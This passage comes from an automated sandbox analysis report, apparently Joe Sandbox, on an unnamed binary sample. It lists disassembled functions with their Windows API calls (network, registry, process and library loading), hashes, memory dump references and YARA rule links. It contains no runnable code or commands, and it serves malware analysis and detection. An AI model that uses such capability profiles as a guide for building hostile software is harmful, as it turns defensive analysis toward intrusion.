                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008218F0,00000000), ref: 007A5B3E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                        • Opcode ID: b060f89fa6361415b3263b6707d9cd5b9206919c00660400a152c97d53b9d7ba
                                                                                                                                        • Instruction ID: c62d7bec24a760fdba838e2f14ad93e3ca59d1563ea8ffabe610b29d2c3745fb
                                                                                                                                        • Opcode Fuzzy Hash: b060f89fa6361415b3263b6707d9cd5b9206919c00660400a152c97d53b9d7ba
                                                                                                                                        • Instruction Fuzzy Hash: 47419171204741EFDB24DF24C884B2AB7E4AFCA725F04471DF9A59B2D1D778A800CB66
                                                                                                                                        Function 007C0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 007C0478
                                                                                                                                          • Part of subcall function 00767F40: _memmove.LIBCMT ref: 00767F8F
                                                                                                                                          • Part of subcall function 0076A2FB: _memmove.LIBCMT ref: 0076A33D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                                        • Opcode ID: 0b36ffb84f5c0c9506b0fe05c7c1dc23b9b2892277c37dc18eddd216085346c4
                                                                                                                                        • Instruction ID: 92a931763e0767d39b986afc977f8b25bfd4c0c7beaecf5f377aa9ed69bb0b34
                                                                                                                                        • Opcode Fuzzy Hash: 0b36ffb84f5c0c9506b0fe05c7c1dc23b9b2892277c37dc18eddd216085346c4
                                                                                                                                        • Instruction Fuzzy Hash: 21319C7450060AEBCF04EF58C840EEEB3B5FF05350B108A2DE826A72D1DB39AA45CB80
                                                                                                                                        Function 0079C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0079C684
                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0079C697
                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0079C6C7
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                                        • Opcode ID: 26a5c9c76b54516c273770e210b6a81bc11cb8105cca974b33b4d57cb298b611
                                                                                                                                        • Instruction ID: e6866d19a628893ed3c90a7f3402256c532bb1a1763f471db36961f0bcef30bb
                                                                                                                                        • Opcode Fuzzy Hash: 26a5c9c76b54516c273770e210b6a81bc11cb8105cca974b33b4d57cb298b611
                                                                                                                                        • Instruction Fuzzy Hash: DB21E471900108AEDF15ABA4D88ADFE7778DF05350B148119F422E71E0DB7D4D0A9760
                                                                                                                                        Function 007B4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B4A60
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B4A86
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007B4AB6
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 007B4AFD
                                                                                                                                          • Part of subcall function 007B56A9: GetLastError.KERNEL32(?,?,007B4A2B,00000000,00000000,00000001), ref: 007B56BE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                                        • Opcode ID: 16243cb66b027bd8348a4337927a305fe373713571c560268db3970a11f4e5a9
                                                                                                                                        • Instruction ID: 35d44f9b05901f753a09c9a4f8085b7660eb3f7bbd57d873426adb01b0acf2f9
                                                                                                                                        • Opcode Fuzzy Hash: 16243cb66b027bd8348a4337927a305fe373713571c560268db3970a11f4e5a9
                                                                                                                                        • Instruction Fuzzy Hash: 0D219FB6580208BFEB21DF649CC9FFBBAECEB48B44F10801AF505D6141EA789D059779
                                                                                                                                        Function 007638E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007D454E
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • _memset.LIBCMT ref: 00763965
                                                                                                                                        • _wcscpy.LIBCMT ref: 007639B5
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007639C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                        • String ID: Line:
                                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                                        • Opcode ID: df63741e25718314dfc636daf7b2e545cb84d3a2a11f4c08c6cdd40d44111476
                                                                                                                                        • Instruction ID: 5fdac7d0b7ad3d2a0bea10baafd3460536d0a14c33f6a21f65af229d2531cc4b
                                                                                                                                        • Opcode Fuzzy Hash: df63741e25718314dfc636daf7b2e545cb84d3a2a11f4c08c6cdd40d44111476
                                                                                                                                        • Instruction Fuzzy Hash: 3C31D571008340ABD731EB60CC49FDF77E8BF59354F10851AF98A921A1DB78AB49CB96
                                                                                                                                        Function 007C8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                          • Part of subcall function 0077C619: GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                          • Part of subcall function 0077C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C8F69
                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 007C8F70
                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C8F85
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007C8F8D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                                        • Opcode ID: b396db3caf0b82c43f352ee7a940d57d585eb15141aefc4745f1fc439767d293
                                                                                                                                        • Instruction ID: 145e270276569cd053b661a3682f7d69bd47b97256a073b317c3707814f51fb1
                                                                                                                                        • Opcode Fuzzy Hash: b396db3caf0b82c43f352ee7a940d57d585eb15141aefc4745f1fc439767d293
                                                                                                                                        • Instruction Fuzzy Hash: F3218871200205AFEF604E64EC84FBB77AAEB59364F10862CFA1497190DB79DC909762
                                                                                                                                        Function 007AE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AE392
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 007AE3E6
                                                                                                                                        • __swprintf.LIBCMT ref: 007AE3FF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,007FDBF0), ref: 007AE43D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                        • String ID: %lu
                                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                                        • Opcode ID: 230efd25e3d1a8cac4ba40492321483ec02bd8e313c290a738878480502f993c
                                                                                                                                        • Instruction ID: 072e4d583fa198ae4a84e5ef0acb13ad4b97319498472c57ad77c5544720148e
                                                                                                                                        • Opcode Fuzzy Hash: 230efd25e3d1a8cac4ba40492321483ec02bd8e313c290a738878480502f993c
                                                                                                                                        • Instruction Fuzzy Hash: DA216075A40108EFCB10EFA4CC89DAE7BB9EF89710B108059F909DB251D635DE01CB50
                                                                                                                                        Function 0079D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                          • Part of subcall function 0079D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079D640
                                                                                                                                          • Part of subcall function 0079D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079D653
                                                                                                                                          • Part of subcall function 0079D623: GetCurrentThreadId.KERNEL32 ref: 0079D65A
                                                                                                                                          • Part of subcall function 0079D623: AttachThreadInput.USER32(00000000), ref: 0079D661
                                                                                                                                        • GetFocus.USER32 ref: 0079D7FB
                                                                                                                                          • Part of subcall function 0079D66C: GetParent.USER32(?), ref: 0079D67A
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0079D844
                                                                                                                                        • EnumChildWindows.USER32(?,0079D8BA), ref: 0079D86C
                                                                                                                                        • __swprintf.LIBCMT ref: 0079D886
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                        • String ID: %s%d
                                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                                        • Opcode ID: bb2f53ca827911a1db6b1f2e12b7d87eabcc3443ea3248fd4f3bf8ca30df90b2
                                                                                                                                        • Instruction ID: b7681680dbcb04bf3d5872921991632dacd39970f036bc4685bb99dfdba96f67
                                                                                                                                        • Opcode Fuzzy Hash: bb2f53ca827911a1db6b1f2e12b7d87eabcc3443ea3248fd4f3bf8ca30df90b2
                                                                                                                                        • Instruction Fuzzy Hash: 9C11A271500205BBDF21BFA0AC89FEA3779AB44754F0080B9BE09AA146DB7D5D458B70
                                                                                                                                        Function 007C1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007C18E4
                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007C1917
                                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007C1A3A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007C1AB0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2364364464-0
                                                                                                                                        • Opcode ID: dbdf74bae3da172bdc402112adfa4c1586b18b9c9f9cff96b75d8e252030206c
                                                                                                                                        • Instruction ID: 17c2af58ac44120f54ded965d5e3cadd82114fc09dc13a299f0afb41a3bff2a4
                                                                                                                                        • Opcode Fuzzy Hash: dbdf74bae3da172bdc402112adfa4c1586b18b9c9f9cff96b75d8e252030206c
                                                                                                                                        • Instruction Fuzzy Hash: 51818370A40205EBDF10AF64C889BAD7BE5EF45720F54C059F919AF382D7B8E9418B90
                                                                                                                                        Function 007C0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007C05DF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007C066E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 007C068C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007C06D2
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 007C06EC
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AAEA5,?,?,00000000,00000008), ref: 0077F282
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AAEA5,?,?,00000000,00000008), ref: 0077F2A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327935632-0
                                                                                                                                        • Opcode ID: 807f3cdf5c4d91aa0569f67663eecc3a4a29770e3523f4c0c98081cca241882b
                                                                                                                                        • Instruction ID: f53c3551711036f99aa0f49f6df41a4098e1506e70ad265ff2d660727f3b7252
                                                                                                                                        • Opcode Fuzzy Hash: 807f3cdf5c4d91aa0569f67663eecc3a4a29770e3523f4c0c98081cca241882b
                                                                                                                                        • Instruction Fuzzy Hash: 59514B75A00205EFCB00EFA8C894EADB7B5BF48310F158059E956AB351DB38ED45CF91
                                                                                                                                        Function 007C2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2DE0
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C2E1F
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007C2E66
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 007C2E92
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C2E9F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3440857362-0
                                                                                                                                        • Opcode ID: 946452e4e1db092eed337da7eb0ec738af15b37a7a71cf9ebca0773070db7bc9
                                                                                                                                        • Instruction ID: a3082ad6059a7df52f40a63b073c0f8a398ded25291cf483db72367615524552
                                                                                                                                        • Opcode Fuzzy Hash: 946452e4e1db092eed337da7eb0ec738af15b37a7a71cf9ebca0773070db7bc9
                                                                                                                                        • Instruction Fuzzy Hash: 01516C71204205EFC714EF64C885F6AB7E8BF88304F04891DF9969B2A2DB39ED05DB52
                                                                                                                                        Function 007CCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fbceade026a981a90505247f8634f1a745ba53545bee427ed7abceb528f6a51d
                                                                                                                                        • Instruction ID: 2a5bd4a3294456e29ddeaec91b26f9a2213af8e1fded756622bec5c0c4d12105
